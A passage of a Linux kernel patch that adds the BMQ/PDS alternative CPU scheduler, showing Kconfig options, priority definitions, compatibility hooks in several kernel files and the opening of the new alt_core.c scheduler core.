+  * the fact that any of them has higher prio than RT and
+@@ -21,6 +40,7 @@ static inline int dl_task(struct task_struct *p)
+ {
+ 	return dl_prio(p->prio);
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ static inline bool dl_time_before(u64 a, u64 b)
+ {
+diff --git a/include/linux/sched/prio.h b/include/linux/sched/prio.h
+index ab83d85e1183..6af9ae681116 100644
+--- a/include/linux/sched/prio.h
++++ b/include/linux/sched/prio.h
+@@ -18,6 +18,32 @@
+ #define MAX_PRIO		(MAX_RT_PRIO + NICE_WIDTH)
+ #define DEFAULT_PRIO		(MAX_RT_PRIO + NICE_WIDTH / 2)
+ 
++#ifdef CONFIG_SCHED_ALT
++
++/* Undefine MAX_PRIO and DEFAULT_PRIO */
++#undef MAX_PRIO
++#undef DEFAULT_PRIO
++
++/* +/- priority levels from the base priority */
++#ifdef CONFIG_SCHED_BMQ
++#define MAX_PRIORITY_ADJ	(7)
++
++#define MIN_NORMAL_PRIO		(MAX_RT_PRIO)
++#define MAX_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH)
++#define DEFAULT_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH / 2)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++#define MAX_PRIORITY_ADJ	(0)
++
++#define MIN_NORMAL_PRIO		(128)
++#define NORMAL_PRIO_NUM		(64)
++#define MAX_PRIO		(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM)
++#define DEFAULT_PRIO		(MAX_PRIO - NICE_WIDTH / 2)
++#endif
++
++#endif /* CONFIG_SCHED_ALT */
++
+ /*
+  * Convert user-nice values [ -20 ... 0 ... 19 ]
+  * to static priority [ MAX_RT_PRIO..MAX_PRIO-1 ],
+diff --git a/include/linux/sched/rt.h b/include/linux/sched/rt.h
+index 994c25640e15..8c050a59ece1 100644
+--- a/include/linux/sched/rt.h
++++ b/include/linux/sched/rt.h
+@@ -24,8 +24,10 @@ static inline bool task_is_realtime(struct task_struct *tsk)
+ 
+ 	if (policy == SCHED_FIFO || policy == SCHED_RR)
+ 		return true;
++#ifndef CONFIG_SCHED_ALT
+ 	if (policy == SCHED_DEADLINE)
+ 		return true;
++#endif
+ 	return false;
+ }
+ 
+diff --git a/include/linux/sched/topology.h b/include/linux/sched/topology.h
+index 816df6cc444e..c8da08e18c91 100644
+--- a/include/linux/sched/topology.h
++++ b/include/linux/sched/topology.h
+@@ -234,7 +234,8 @@ static inline bool cpus_share_cache(int this_cpu, int that_cpu)
+ 
+ #endif	/* !CONFIG_SMP */
+ 
+-#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL)
++#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL) && \
++	!defined(CONFIG_SCHED_ALT)
+ extern void rebuild_sched_domains_energy(void);
+ #else
+ static inline void rebuild_sched_domains_energy(void)
+diff --git a/init/Kconfig b/init/Kconfig
+index 94125d3b6893..c87ba766d354 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -819,6 +819,7 @@ menu "Scheduler features"
+ config UCLAMP_TASK
+ 	bool "Enable utilization clamping for RT/FAIR tasks"
+ 	depends on CPU_FREQ_GOV_SCHEDUTIL
++	depends on !SCHED_ALT
+ 	help
+ 	  This feature enables the scheduler to track the clamped utilization
+ 	  of each CPU based on RUNNABLE tasks scheduled on that CPU.
+@@ -865,6 +866,35 @@ config UCLAMP_BUCKETS_COUNT
+ 
+ 	  If in doubt, use the default value.
+ 
++menuconfig SCHED_ALT
++	bool "Alternative CPU Schedulers"
++	default n
++	help
++	  This feature enable alternative CPU scheduler"
++
++if SCHED_ALT
++
++choice
++	prompt "Alternative CPU Scheduler"
++	default SCHED_BMQ
++
++config SCHED_BMQ
++	bool "BMQ CPU scheduler"
++	help
++	  The BitMap Queue CPU scheduler for excellent interactivity and
++	  responsiveness on the desktop and solid scalability on normal
++	  hardware and commodity servers.
++
++config SCHED_PDS
++	bool "PDS CPU scheduler"
++	help
++	  The Priority and Deadline based Skip list multiple queue CPU
++	  Scheduler.
++
++endchoice
++
++endif
++
+ endmenu
+ 
+ #
+@@ -918,6 +948,7 @@ config NUMA_BALANCING
+ 	depends on ARCH_SUPPORTS_NUMA_BALANCING
+ 	depends on !ARCH_WANT_NUMA_VARIABLE_LOCALITY
+ 	depends on SMP && NUMA && MIGRATION && !PREEMPT_RT
++	depends on !SCHED_ALT
+ 	help
+ 	  This option adds support for automatic NUMA aware memory/task placement.
+ 	  The mechanism is quite primitive and is based on migrating memory when
+@@ -1015,6 +1046,7 @@ config FAIR_GROUP_SCHED
+ 	depends on CGROUP_SCHED
+ 	default CGROUP_SCHED
+ 
++if !SCHED_ALT
+ config CFS_BANDWIDTH
+ 	bool "CPU bandwidth provisioning for FAIR_GROUP_SCHED"
+ 	depends on FAIR_GROUP_SCHED
+@@ -1037,6 +1069,7 @@ config RT_GROUP_SCHED
+ 	  realtime bandwidth for them.
+ 	  See Documentation/scheduler/sched-rt-group.rst for more information.
+ 
++endif #!SCHED_ALT
+ endif #CGROUP_SCHED
+ 
+ config UCLAMP_TASK_GROUP
+@@ -1281,6 +1314,7 @@ config CHECKPOINT_RESTORE
+ 
+ config SCHED_AUTOGROUP
+ 	bool "Automatic process group scheduling"
++	depends on !SCHED_ALT
+ 	select CGROUPS
+ 	select CGROUP_SCHED
+ 	select FAIR_GROUP_SCHED
+diff --git a/init/init_task.c b/init/init_task.c
+index ff6c4b9bfe6b..19e9c662d1a1 100644
+--- a/init/init_task.c
++++ b/init/init_task.c
+@@ -75,9 +75,15 @@ struct task_struct init_task
+ 	.stack		= init_stack,
+ 	.usage		= REFCOUNT_INIT(2),
+ 	.flags		= PF_KTHREAD,
++#ifdef CONFIG_SCHED_ALT
++	.prio		= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
++	.static_prio	= DEFAULT_PRIO,
++	.normal_prio	= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
++#else
+ 	.prio		= MAX_PRIO - 20,
+ 	.static_prio	= MAX_PRIO - 20,
+ 	.normal_prio	= MAX_PRIO - 20,
++#endif
+ 	.policy		= SCHED_NORMAL,
+ 	.cpus_ptr	= &init_task.cpus_mask,
+ 	.user_cpus_ptr	= NULL,
+@@ -88,6 +94,17 @@ struct task_struct init_task
+ 	.restart_block	= {
+ 		.fn = do_no_restart_syscall,
+ 	},
++#ifdef CONFIG_SCHED_ALT
++	.sq_node	= LIST_HEAD_INIT(init_task.sq_node),
++#ifdef CONFIG_SCHED_BMQ
++	.boost_prio	= 0,
++	.sq_idx		= 15,
++#endif
++#ifdef CONFIG_SCHED_PDS
++	.deadline	= 0,
++#endif
++	.time_slice	= HZ,
++#else
+ 	.se		= {
+ 		.group_node 	= LIST_HEAD_INIT(init_task.se.group_node),
+ 	},
+@@ -95,6 +112,7 @@ struct task_struct init_task
+ 		.run_list	= LIST_HEAD_INIT(init_task.rt.run_list),
+ 		.time_slice	= RR_TIMESLICE,
+ 	},
++#endif
+ 	.tasks		= LIST_HEAD_INIT(init_task.tasks),
+ #ifdef CONFIG_SMP
+ 	.pushable_tasks	= PLIST_NODE_INIT(init_task.pushable_tasks, MAX_PRIO),
+diff --git a/kernel/Kconfig.preempt b/kernel/Kconfig.preempt
+index c2f1fd95a821..41654679b1b2 100644
+--- a/kernel/Kconfig.preempt
++++ b/kernel/Kconfig.preempt
+@@ -117,7 +117,7 @@ config PREEMPT_DYNAMIC
+ 
+ config SCHED_CORE
+ 	bool "Core Scheduling for SMT"
+-	depends on SCHED_SMT
++	depends on SCHED_SMT && !SCHED_ALT
+ 	help
+ 	  This option permits Core Scheduling, a means of coordinated task
+ 	  selection across SMT siblings. When enabled -- see
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index b474289c15b8..a23224b45b03 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -787,7 +787,7 @@ static int validate_change(struct cpuset *cur, struct cpuset *trial)
+ 	return ret;
+ }
+ 
+-#ifdef CONFIG_SMP
++#if defined(CONFIG_SMP) && !defined(CONFIG_SCHED_ALT)
+ /*
+  * Helper routine for generate_sched_domains().
+  * Do cpusets a, b have overlapping effective cpus_allowed masks?
+@@ -1183,7 +1183,7 @@ static void rebuild_sched_domains_locked(void)
+ 	/* Have scheduler rebuild the domains */
+ 	partition_and_rebuild_sched_domains(ndoms, doms, attr);
+ }
+-#else /* !CONFIG_SMP */
++#else /* !CONFIG_SMP || CONFIG_SCHED_ALT */
+ static void rebuild_sched_domains_locked(void)
+ {
+ }
+diff --git a/kernel/delayacct.c b/kernel/delayacct.c
+index e39cb696cfbd..463423572e09 100644
+--- a/kernel/delayacct.c
++++ b/kernel/delayacct.c
+@@ -150,7 +150,7 @@ int delayacct_add_tsk(struct taskstats *d, struct task_struct *tsk)
+ 	 */
+ 	t1 = tsk->sched_info.pcount;
+ 	t2 = tsk->sched_info.run_delay;
+-	t3 = tsk->se.sum_exec_runtime;
++	t3 = tsk_seruntime(tsk);
+ 
+ 	d->cpu_count += t1;
+ 
+diff --git a/kernel/exit.c b/kernel/exit.c
+index 35e0a31a0315..64e368441cf4 100644
+--- a/kernel/exit.c
++++ b/kernel/exit.c
+@@ -125,7 +125,7 @@ static void __exit_signal(struct task_struct *tsk)
+ 			sig->curr_target = next_thread(tsk);
+ 	}
+ 
+-	add_device_randomness((const void*) &tsk->se.sum_exec_runtime,
++	add_device_randomness((const void*) &tsk_seruntime(tsk),
+ 			      sizeof(unsigned long long));
+ 
+ 	/*
+@@ -146,7 +146,7 @@ static void __exit_signal(struct task_struct *tsk)
+ 	sig->inblock += task_io_get_inblock(tsk);
+ 	sig->oublock += task_io_get_oublock(tsk);
+ 	task_io_accounting_add(&sig->ioac, &tsk->ioac);
+-	sig->sum_sched_runtime += tsk->se.sum_exec_runtime;
++	sig->sum_sched_runtime += tsk_seruntime(tsk);
+ 	sig->nr_threads--;
+ 	__unhash_process(tsk, group_dead);
+ 	write_sequnlock(&sig->stats_lock);
+diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
+index 7779ee8abc2a..5b9893cdfb1b 100644
+--- a/kernel/locking/rtmutex.c
++++ b/kernel/locking/rtmutex.c
+@@ -300,21 +300,25 @@ static __always_inline void
+ waiter_update_prio(struct rt_mutex_waiter *waiter, struct task_struct *task)
+ {
+ 	waiter->prio = __waiter_prio(task);
+-	waiter->deadline = task->dl.deadline;
++	waiter->deadline = __tsk_deadline(task);
+ }
+ 
+ /*
+  * Only use with rt_mutex_waiter_{less,equal}()
+  */
+ #define task_to_waiter(p)	\
+-	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
++	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = __tsk_deadline(p) }
+ 
+ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
+ 						struct rt_mutex_waiter *right)
+ {
++#ifdef CONFIG_SCHED_PDS
++	return (left->deadline < right->deadline);
++#else
+ 	if (left->prio < right->prio)
+ 		return 1;
+ 
++#ifndef CONFIG_SCHED_BMQ
+ 	/*
+ 	 * If both waiters have dl_prio(), we check the deadlines of the
+ 	 * associated tasks.
+@@ -323,16 +327,22 @@ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
+ 	 */
+ 	if (dl_prio(left->prio))
+ 		return dl_time_before(left->deadline, right->deadline);
++#endif
+ 
+ 	return 0;
++#endif
+ }
+ 
+ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
+ 						 struct rt_mutex_waiter *right)
+ {
++#ifdef CONFIG_SCHED_PDS
++	return (left->deadline == right->deadline);
++#else
+ 	if (left->prio != right->prio)
+ 		return 0;
+ 
++#ifndef CONFIG_SCHED_BMQ
+ 	/*
+ 	 * If both waiters have dl_prio(), we check the deadlines of the
+ 	 * associated tasks.
+@@ -341,8 +351,10 @@ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
+ 	 */
+ 	if (dl_prio(left->prio))
+ 		return left->deadline == right->deadline;
++#endif
+ 
+ 	return 1;
++#endif
+ }
+ 
+ static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
+diff --git a/kernel/sched/Makefile b/kernel/sched/Makefile
+index 976092b7bd45..31d587c16ec1 100644
+--- a/kernel/sched/Makefile
++++ b/kernel/sched/Makefile
+@@ -28,7 +28,12 @@ endif
+ # These compilation units have roughly the same size and complexity - so their
+ # build parallelizes well and finishes roughly at once:
+ #
++ifdef CONFIG_SCHED_ALT
++obj-y += alt_core.o
++obj-$(CONFIG_SCHED_DEBUG) += alt_debug.o
++else
+ obj-y += core.o
+ obj-y += fair.o
++endif
+ obj-y += build_policy.o
+ obj-y += build_utility.o
+diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
+new file mode 100644
+index 000000000000..4bea0c025475
+--- /dev/null
++++ b/kernel/sched/alt_core.c
+@@ -0,0 +1,7912 @@
++/*
++ *  kernel/sched/alt_core.c
++ *
++ *  Core alternative kernel scheduler code and related syscalls
++ *
++ *  Copyright (C) 1991-2002  Linus Torvalds
++ *
++ *  2009-08-13	Brainfuck deadline scheduling policy by Con Kolivas deletes
++ *		a whole lot of those previous things.
++ *  2017-09-06	Priority and Deadline based Skip list multiple queue kernel
++ *		scheduler by Alfred Chen.
++ *  2019-02-20	BMQ(BitMap Queue) kernel scheduler by Alfred Chen.
++ */
++#include <linux/sched/cputime.h>
++#include <linux/sched/debug.h>
++#include <linux/sched/isolation.h>
++#include <linux/sched/loadavg.h>
++#include <linux/sched/mm.h>
++#include <linux/sched/nohz.h>
++#include <linux/sched/stat.h>
++#include <linux/sched/wake_q.h>
++
++#include <linux/blkdev.h>
++#include <linux/context_tracking.h>
++#include <linux/cpuset.h>
++#include <linux/delayacct.h>
++#include <linux/init_task.h>
++#include <linux/kcov.h>
++#include <linux/kprobes.h>
++#include <linux/profile.h>
++#include <linux/nmi.h>
++#include <linux/scs.h>
++
++#include <uapi/linux/sched/types.h>
++
++#include <asm/irq_regs.h>
++#include <asm/switch_to.h>
++
++#define CREATE_TRACE_POINTS
++#include <trace/events/sched.h>
++#undef CREATE_TRACE_POINTS
++
++#include "sched.h"
++
++#include "pelt.h"
++
++#include "../../io_uring/io-wq.h"
++#include "../smpboot.h"
++
++/*
++ * Export tracepoints that act as a bare tracehook (ie: have no trace event
++ * associated with them) to allow external modules to probe them.
++ */
++EXPORT_TRACEPOINT_SYMBOL_GPL(pelt_irq_tp);
++
++#ifdef CONFIG_SCHED_DEBUG
++#define sched_feat(x)	(1)
++/*
++ * Print a warning if need_resched is set for the given duration (if
++ * LATENCY_WARN is enabled).
++ *
++ * If sysctl_resched_latency_warn_once is set, only one warning will be shown
++ * per boot.
++ */
++__read_mostly int sysctl_resched_latency_warn_ms = 100;
++__read_mostly int sysctl_resched_latency_warn_once = 1;
++#else
++#define sched_feat(x)	(0)
++#endif /* CONFIG_SCHED_DEBUG */
++
++#define ALT_SCHED_VERSION "v6.1-r0"
++
++/* rt_prio(prio) defined in include/linux/sched/rt.h */
++#define rt_task(p)		rt_prio((p)->prio)
++#define rt_policy(policy)	((policy) == SCHED_FIFO || (policy) == SCHED_RR)
++#define task_has_rt_policy(p)	(rt_policy((p)->policy))
++
++#define STOP_PRIO		(MAX_RT_PRIO - 1)
++
++/* Default time slice is 4 in ms, can be set via kernel parameter "sched_timeslice" */
++u64 sched_timeslice_ns __read_mostly = (4 << 20);
++
++static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx);
++
++#ifdef CONFIG_SCHED_BMQ
++#include "bmq.h"
++#endif
++#ifdef CONFIG_SCHED_PDS
++#include "pds.h"
++#endif
++
++static int __init sched_timeslice(char *str)
++{
++	int timeslice_ms;
++
++	get_option(&str, &timeslice_ms);
++	if (2 != timeslice_ms)
++		timeslice_ms = 4;
++	sched_timeslice_ns = timeslice_ms << 20;
++	sched_timeslice_imp(timeslice_ms);
++
++	return 0;
++}
++early_param("sched_timeslice", sched_timeslice);
++
++/* Reschedule if less than this many μs left */
++#define RESCHED_NS		(100 << 10)
++
++/**
++ * sched_yield_type - Choose what sort of yield sched_yield will perform.
++ * 0: No yield.
++ * 1: Deboost and requeue task. (default)
++ * 2: Set rq skip task.
++ */
++int sched_yield_type __read_mostly = 1;
++
++#ifdef CONFIG_SMP
++static cpumask_t sched_rq_pending_mask ____cacheline_aligned_in_smp;
++
++DEFINE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
++DEFINE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
++DEFINE_PER_CPU(cpumask_t *, sched_cpu_topo_end_mask);
++
++#ifdef CONFIG_SCHED_SMT
++DEFINE_STATIC_KEY_FALSE(sched_smt_present);
++EXPORT_SYMBOL_GPL(sched_smt_present);
++#endif
++
++/*
++ * Keep a unique ID per domain (we use the first CPUs number in the cpumask of
++ * the domain), this allows us to quickly tell if two cpus are in the same cache
++ * domain, see cpus_share_cache().
++ */
++DEFINE_PER_CPU(int, sd_llc_id);
++#endif /* CONFIG_SMP */
++
++static DEFINE_MUTEX(sched_hotcpu_mutex);
++
++DEFINE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
++
++#ifndef prepare_arch_switch
++# define prepare_arch_switch(next)	do { } while (0)
++#endif
++#ifndef finish_arch_post_lock_switch
++# define finish_arch_post_lock_switch()	do { } while (0)
++#endif
++
++#ifdef CONFIG_SCHED_SMT
++static cpumask_t sched_sg_idle_mask ____cacheline_aligned_in_smp;
++#endif
++static cpumask_t sched_rq_watermark[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
++
++/* sched_queue related functions */
++static inline void sched_queue_init(struct sched_queue *q)
++{
++	int i;
++
++	bitmap_zero(q->bitmap, SCHED_QUEUE_BITS);
++	for(i = 0; i < SCHED_BITS; i++)
++		INIT_LIST_HEAD(&q->heads[i]);
++}
++
++/*
++ * Init idle task and put into queue structure of rq
++ * IMPORTANT: may be called multiple times for a single cpu
++ */
++static inline void sched_queue_init_idle(struct sched_queue *q,
++					 struct task_struct *idle)
++{
++	idle->sq_idx = IDLE_TASK_SCHED_PRIO;
++	INIT_LIST_HEAD(&q->heads[idle->sq_idx]);
++	list_add(&idle->sq_node, &q->heads[idle->sq_idx]);
++}
++
++/* water mark related functions */
++static inline void update_sched_rq_watermark(struct rq *rq)
++{
++	unsigned long watermark = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	unsigned long last_wm = rq->watermark;
++	unsigned long i;
++	int cpu;
++
++	if (watermark == last_wm)
++		return;
++
++	rq->watermark = watermark;
++	cpu = cpu_of(rq);
++	if (watermark < last_wm) {
++		for (i = last_wm; i > watermark; i--)
++			cpumask_clear_cpu(cpu, sched_rq_watermark + SCHED_QUEUE_BITS - i);
++#ifdef CONFIG_SCHED_SMT
++		if (static_branch_likely(&sched_smt_present) &&
++		    IDLE_TASK_SCHED_PRIO == last_wm)
++			cpumask_andnot(&sched_sg_idle_mask,
++				       &sched_sg_idle_mask, cpu_smt_mask(cpu));
++#endif
++		return;
++	}
++	/* last_wm < watermark */
++	for (i = watermark; i > last_wm; i--)
++		cpumask_set_cpu(cpu, sched_rq_watermark + SCHED_QUEUE_BITS - i);
++#ifdef CONFIG_SCHED_SMT
++	if (static_branch_likely(&sched_smt_present) &&
++	    IDLE_TASK_SCHED_PRIO == watermark) {
++		cpumask_t tmp;
++
++		cpumask_and(&tmp, cpu_smt_mask(cpu), sched_rq_watermark);
++		if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
++			cpumask_or(&sched_sg_idle_mask,
++				   &sched_sg_idle_mask, cpu_smt_mask(cpu));
++	}
++#endif
++}
++
++/*
++ * This routine assume that the idle task always in queue
++ */
++static inline struct task_struct *sched_rq_first_task(struct rq *rq)
++{
++	unsigned long idx = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	const struct list_head *head = &rq->queue.heads[sched_prio2idx(idx, rq)];
++
++	return list_first_entry(head, struct task_struct, sq_node);
++}
++
++static inline struct task_struct *
++sched_rq_next_task(struct task_struct *p, struct rq *rq)
++{
++	unsigned long idx = p->sq_idx;
++	struct list_head *head = &rq->queue.heads[idx];
++
++	if (list_is_last(&p->sq_node, head)) {
++		idx = find_next_bit(rq->queue.bitmap, SCHED_QUEUE_BITS,
++				    sched_idx2prio(idx, rq) + 1);
++		head = &rq->queue.heads[sched_prio2idx(idx, rq)];
++
++		return list_first_entry(head, struct task_struct, sq_node);
++	}
++
++	return list_next_entry(p, sq_node);
++}
++
++static inline struct task_struct *rq_runnable_task(struct rq *rq)
++{
++	struct task_struct *next = sched_rq_first_task(rq);
++
++	if (unlikely(next == rq->skip))
++		next = sched_rq_next_task(next, rq);
++
++	return next;
++}
++
++/*
++ * Serialization rules:
++ *
++ * Lock order:
++ *
++ *   p->pi_lock
++ *     rq->lock
++ *       hrtimer_cpu_base->lock (hrtimer_start() for bandwidth controls)
++ *
++ *  rq1->lock
++ *    rq2->lock  where: rq1 < rq2
++ *
++ * Regular state:
++ *
++ * Normal scheduling state is serialized by rq->lock. __schedule() takes the
++ * local CPU's rq->lock, it optionally removes the task from the runqueue and
++ * always looks at the local rq data structures to find the most eligible task
++ * to run next.
++ *
++ * Task enqueue is also under rq->lock, possibly taken from another CPU.
++ * Wakeups from another LLC domain might use an IPI to transfer the enqueue to
++ * the local CPU to avoid bouncing the runqueue state around [ see
++ * ttwu_queue_wakelist() ]
++ *
++ * Task wakeup, specifically wakeups that involve migration, are horribly
++ * complicated to avoid having to take two rq->locks.
++ *
++ * Special state:
++ *
++ * System-calls and anything external will use task_rq_lock() which acquires
++ * both p->pi_lock and rq->lock. As a consequence the state they change is
++ * stable while holding either lock:
++ *
++ *  - sched_setaffinity()/
++ *    set_cpus_allowed_ptr():	p->cpus_ptr, p->nr_cpus_allowed
++ *  - set_user_nice():		p->se.load, p->*prio
++ *  - __sched_setscheduler():	p->sched_class, p->policy, p->*prio,
++ *				p->se.load, p->rt_priority,
++ *				p->dl.dl_{runtime, deadline, period, flags, bw, density}
++ *  - sched_setnuma():		p->numa_preferred_nid
++ *  - sched_move_task():        p->sched_task_group
++ *  - uclamp_update_active()	p->uclamp*
++ *
++ * p->state <- TASK_*:
++ *
++ *   is changed locklessly using set_current_state(), __set_current_state() or
++ *   set_special_state(), see their respective comments, or by
++ *   try_to_wake_up(). This latter uses p->pi_lock to serialize against
++ *   concurrent self.
++ *
++ * p->on_rq <- { 0, 1 = TASK_ON_RQ_QUEUED, 2 = TASK_ON_RQ_MIGRATING }:
++ *
++ *   is set by activate_task() and cleared by deactivate_task(), under
++ *   rq->lock. Non-zero indicates the task is runnable, the special
++ *   ON_RQ_MIGRATING state is used for migration without holding both
++ *   rq->locks. It indicates task_cpu() is not stable, see task_rq_lock().
++ *
++ * p->on_cpu <- { 0, 1 }:
++ *
++ *   is set by prepare_task() and cleared by finish_task() such that it will be
++ *   set before p is scheduled-in and cleared after p is scheduled-out, both
++ *   under rq->lock. Non-zero indicates the task is running on its CPU.
++ *
++ *   [ The astute reader will observe that it is possible for two tasks on one
++ *     CPU to have ->on_cpu = 1 at the same time. ]
++ *
++ * task_cpu(p): is changed by set_task_cpu(), the rules are:
++ *
++ *  - Don't call set_task_cpu() on a blocked task:
++ *
++ *    We don't care what CPU we're not running on, this simplifies hotplug,
++ *    the CPU assignment of blocked tasks isn't required to be valid.
++ *
++ *  - for try_to_wake_up(), called under p->pi_lock:
++ *
++ *    This allows try_to_wake_up() to only take one rq->lock, see its comment.
++ *
++ *  - for migration called under rq->lock:
++ *    [ see task_on_rq_migrating() in task_rq_lock() ]
++ *
++ *    o move_queued_task()
++ *    o detach_task()
++ *
++ *  - for migration called under double_rq_lock():
++ *
++ *    o __migrate_swap_task()
++ *    o push_rt_task() / pull_rt_task()
++ *    o push_dl_task() / pull_dl_task()
++ *    o dl_task_offline_migration()
++ *
++ */
++
++/*
++ * Context: p->pi_lock
++ */
++static inline struct rq
++*__task_access_lock(struct task_struct *p, raw_spinlock_t **plock)
++{
++	struct rq *rq;
++	for (;;) {
++		rq = task_rq(p);
++		if (p->on_cpu || task_on_rq_queued(p)) {
++			raw_spin_lock(&rq->lock);
++			if (likely((p->on_cpu || task_on_rq_queued(p))
++				   && rq == task_rq(p))) {
++				*plock = &rq->lock;
++				return rq;
++			}
++			raw_spin_unlock(&rq->lock);
++		} else if (task_on_rq_migrating(p)) {
++			do {
++				cpu_relax();
++			} while (unlikely(task_on_rq_migrating(p)));
++		} else {
++			*plock = NULL;
++			return rq;
++		}
++	}
++}
++
++static inline void
++__task_access_unlock(struct task_struct *p, raw_spinlock_t *lock)
++{
++	if (NULL != lock)
++		raw_spin_unlock(lock);
++}
++
++static inline struct rq
++*task_access_lock_irqsave(struct task_struct *p, raw_spinlock_t **plock,
++			  unsigned long *flags)
++{
++	struct rq *rq;
++	for (;;) {
++		rq = task_rq(p);
++		if (p->on_cpu || task_on_rq_queued(p)) {
++			raw_spin_lock_irqsave(&rq->lock, *flags);
++			if (likely((p->on_cpu || task_on_rq_queued(p))
++				   && rq == task_rq(p))) {
++				*plock = &rq->lock;
++				return rq;
++			}
++			raw_spin_unlock_irqrestore(&rq->lock, *flags);
++		} else if (task_on_rq_migrating(p)) {
++			do {
++				cpu_relax();
++			} while (unlikely(task_on_rq_migrating(p)));
++		} else {
++			raw_spin_lock_irqsave(&p->pi_lock, *flags);
++			if (likely(!p->on_cpu && !p->on_rq &&
++				   rq == task_rq(p))) {
++				*plock = &p->pi_lock;
++				return rq;
++			}
++			raw_spin_unlock_irqrestore(&p->pi_lock, *flags);
++		}
++	}
++}
++
++static inline void
++task_access_unlock_irqrestore(struct task_struct *p, raw_spinlock_t *lock,
++			      unsigned long *flags)
++{
++	raw_spin_unlock_irqrestore(lock, *flags);
++}
++
++/*
++ * __task_rq_lock - lock the rq @p resides on.
++ */
++struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	lockdep_assert_held(&p->pi_lock);
++
++	for (;;) {
++		rq = task_rq(p);
++		raw_spin_lock(&rq->lock);
++		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p)))
++			return rq;
++		raw_spin_unlock(&rq->lock);
++
++		while (unlikely(task_on_rq_migrating(p)))
++			cpu_relax();
++	}
++}
++
++/*
++ * task_rq_lock - lock p->pi_lock and lock the rq @p resides on.
++ */
++struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(p->pi_lock)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	for (;;) {
++		raw_spin_lock_irqsave(&p->pi_lock, rf->flags);
++		rq = task_rq(p);
++		raw_spin_lock(&rq->lock);
++		/*
++		 *	move_queued_task()		task_rq_lock()
++		 *
++		 *	ACQUIRE (rq->lock)
++		 *	[S] ->on_rq = MIGRATING		[L] rq = task_rq()
++		 *	WMB (__set_task_cpu())		ACQUIRE (rq->lock);
++		 *	[S] ->cpu = new_cpu		[L] task_rq()
++		 *					[L] ->on_rq
++		 *	RELEASE (rq->lock)
++		 *
++		 * If we observe the old CPU in task_rq_lock(), the acquire of
++		 * the old rq->lock will fully serialize against the stores.
++		 *
++		 * If we observe the new CPU in task_rq_lock(), the address
++		 * dependency headed by '[L] rq = task_rq()' and the acquire
++		 * will pair with the WMB to ensure we then also see migrating.
++		 */
++		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p))) {
++			return rq;
++		}
++		raw_spin_unlock(&rq->lock);
++		raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
++
++		while (unlikely(task_on_rq_migrating(p)))
++			cpu_relax();
++	}
++}
++
++static inline void
++rq_lock_irqsave(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irqsave(&rq->lock, rf->flags);
++}
++
++static inline void
++rq_unlock_irqrestore(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock_irqrestore(&rq->lock, rf->flags);
++}
++
++void raw_spin_rq_lock_nested(struct rq *rq, int subclass)
++{
++	raw_spinlock_t *lock;
++
++	/* Matches synchronize_rcu() in __sched_core_enable() */
++	preempt_disable();
++
++	for (;;) {
++		lock = __rq_lockp(rq);
++		raw_spin_lock_nested(lock, subclass);
++		if (likely(lock == __rq_lockp(rq))) {
++			/* preempt_count *MUST* be > 1 */
++			preempt_enable_no_resched();
++			return;
++		}
++		raw_spin_unlock(lock);
++	}
++}
++
++void raw_spin_rq_unlock(struct rq *rq)
++{
++	raw_spin_unlock(rq_lockp(rq));
++}
++
++/*
++ * RQ-clock updating methods:
++ */
++
++static void update_rq_clock_task(struct rq *rq, s64 delta)
++{
++/*
++ * In theory, the compile should just see 0 here, and optimize out the call
++ * to sched_rt_avg_update. But I don't trust it...
++ */
++	s64 __maybe_unused steal = 0, irq_delta = 0;
++
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++	irq_delta = irq_time_read(cpu_of(rq)) - rq->prev_irq_time;
++
++	/*
++	 * Since irq_time is only updated on {soft,}irq_exit, we might run into
++	 * this case when a previous update_rq_clock() happened inside a
++	 * {soft,}irq region.
++	 *
++	 * When this happens, we stop ->clock_task and only update the
++	 * prev_irq_time stamp to account for the part that fit, so that a next
++	 * update will consume the rest. This ensures ->clock_task is
++	 * monotonic.
++	 *
++	 * It does however cause some slight miss-attribution of {soft,}irq
++	 * time, a more accurate solution would be to update the irq_time using
++	 * the current rq->clock timestamp, except that would require using
++	 * atomic ops.
++	 */
